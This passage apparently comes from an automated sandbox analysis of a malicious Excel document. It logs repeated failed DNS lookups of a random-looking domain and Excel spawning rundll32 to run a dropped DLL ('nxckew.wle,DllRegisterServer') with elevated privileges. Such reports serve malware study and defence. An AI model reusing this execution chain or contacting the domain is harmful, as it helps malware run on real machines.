                  Jun 11, 2021 12:05:54.909857035 CEST | 192.168.2.22 | 8.8.8.8 | 0x8c10 | Standard query (0) | cyh26wcekai02atpeax.com | A (IP address) | IN (0x0001)
                  Jun 11, 2021 12:05:55.921636105 CEST | 192.168.2.22 | 8.8.8.8 | 0x8c10 | Standard query (0) | cyh26wcekai02atpeax.com | A (IP address) | IN (0x0001)
                  Jun 11, 2021 12:05:56.936053038 CEST | 192.168.2.22 | 8.8.8.8 | 0x8c10 | Standard query (0) | cyh26wcekai02atpeax.com | A (IP address) | IN (0x0001)
                  Jun 11, 2021 12:05:58.948674917 CEST | 192.168.2.22 | 8.8.8.8 | 0x8c10 | Standard query (0) | cyh26wcekai02atpeax.com | A (IP address) | IN (0x0001)

                  DNS Answers

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Jun 11, 2021 12:05:58.979480982 CEST | 8.8.8.8 | 192.168.2.22 | 0x8c10 | Server failure (2) | cyh26wcekai02atpeax.com | none | none | A (IP address) | IN (0x0001)
                  Jun 11, 2021 12:05:59.990859985 CEST | 8.8.8.8 | 192.168.2.22 | 0x8c10 | Server failure (2) | cyh26wcekai02atpeax.com | none | none | A (IP address) | IN (0x0001)
                  Jun 11, 2021 12:06:01.005148888 CEST | 8.8.8.8 | 192.168.2.22 | 0x8c10 | Server failure (2) | cyh26wcekai02atpeax.com | none | none | A (IP address) | IN (0x0001)
                  Jun 11, 2021 12:06:03.025798082 CEST | 8.8.8.8 | 192.168.2.22 | 0x8c10 | Server failure (2) | cyh26wcekai02atpeax.com | none | none | A (IP address) | IN (0x0001)

                  Code Manipulations

                  System Behavior

                  General

                  Start time: 12:05:49
                  Start date: 11/06/2021
                  Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit): false
                  Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase: 0x13ff30000
                  File size: 27641504 bytes
                  MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  General

                  Start time: 12:05:57
                  Start date: 11/06/2021
                  Path: C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit): false
                  Commandline: rundll32 ..\nxckew.wle,DllRegisterServer
                  Imagebase: 0xff6a0000
                  File size: 45568 bytes
                  MD5 hash: DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  Disassembly

                  Code Analysis
